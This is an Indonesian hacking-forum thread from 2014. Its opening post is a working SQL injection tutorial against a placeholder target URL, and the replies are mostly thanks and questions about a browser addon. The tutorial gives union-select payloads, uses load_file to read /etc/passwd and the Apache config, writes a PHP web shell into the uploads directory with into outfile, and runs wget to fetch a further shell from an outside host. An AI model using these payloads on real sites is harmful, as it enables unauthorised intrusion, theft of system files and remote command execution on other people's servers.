Share SQL Injection Load File - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html) +--- Thread: Share SQL Injection Load File (/thread-5845.html) Pages:
1
2
|
SQL Injection Load File - wine trochanter - 06-01-2014 Assalamualaikum numpang spam yee langsung saja, keuntungannya disini gak perlu page admin buat upload backdoor nya target https://www.target.com/ajax_city_all_branch.php?state=PANAJI kasih tanda petik https://www.target.com/ajax_city_all_branch.php?state=PANAJI' Spoiler! :
error sqli, gunakan perintah order by 2-- Spoiler! :
sekarang di ganti seperti ini https://www.target.com/ajax_city_all_branch.php?state=PANAJI' order by 1--+ sudah tidak error Spoiler! :
sekarang gunakan https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select 1--+ Spoiler! :
liat user nya https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select user()--+ Spoiler! :
nahh root syarat melakukan ini ada 2 For creating any file on the website with SQL queries two things are most important 1) Root Path ( We have it by ERROR 2) File Privilages for the Current MySQl User we have File Privilages as well artiin sendiri yah ) selanjutnya https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select load_file(0x2f6574632f706173737764)--+ ctrl+u dah Spoiler! :
nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+ Spoiler! :
sebelum nya ane tes dlu buka path nya misal https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt "wine ganteng" nya di ubah ke hex yah Spoiler! :
Coba sekarang kita masukan ini buat mendonwload bekdor "<? system($_REQUEST['cmd']); ?>" https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- - Spoiler! :
Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt terus kita ubah ekstensi txt ke php mv a.txt index(3)php terus buka dah Spoiler! :
sekian dan terima kasih gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :* RE: SQL Injection Load File - iyan squid - 06-01-2014 jossss (y) RE: SQL Injection Load File - Airsky27 - 06-01-2014 Ijin Di Plajari Dulu Om.. masih rada bingung.. RE: SQL Injection Load File - G_26 - 06-02-2014 Kereeen..Kereeeen Om Wine Ditunggu Tutor Yang Selanjutnya RE: SQL Injection Load File - orang sederhana - 06-02-2014 pak dokter @wine_trochanter itu yang di mozilla nya pake apaan ? di bawah tempat URL RE: SQL Injection Load File - wine trochanter - 06-02-2014 (06-02-2014, 09:39 AM)orang sederhana Wrote: pak dokter @wine_trochanter itu yang di mozilla nya pake apaan ? di bawah tempat URL hackbar nama nya pak RE: SQL Injection Load File - orang sederhana - 06-02-2014 itu addon mozilla pak @winetrochanter ? RE: SQL Injection Load File - wine trochanter - 06-02-2014 (06-02-2014, 03:00 PM)orang sederhana Wrote: itu addon mozilla pak @winetrochanter ? iyuuppss bener RE: SQL Injection Load File - RobotBernyawa - 06-18-2014 Thanks udah sharing ilmunya ijijn nyoba bang RE: SQL Injection Load File - Hankz - 01-30-2015 ngga ketemu pathnya bro,harus gimana lagi yaa cari pathnya bro? |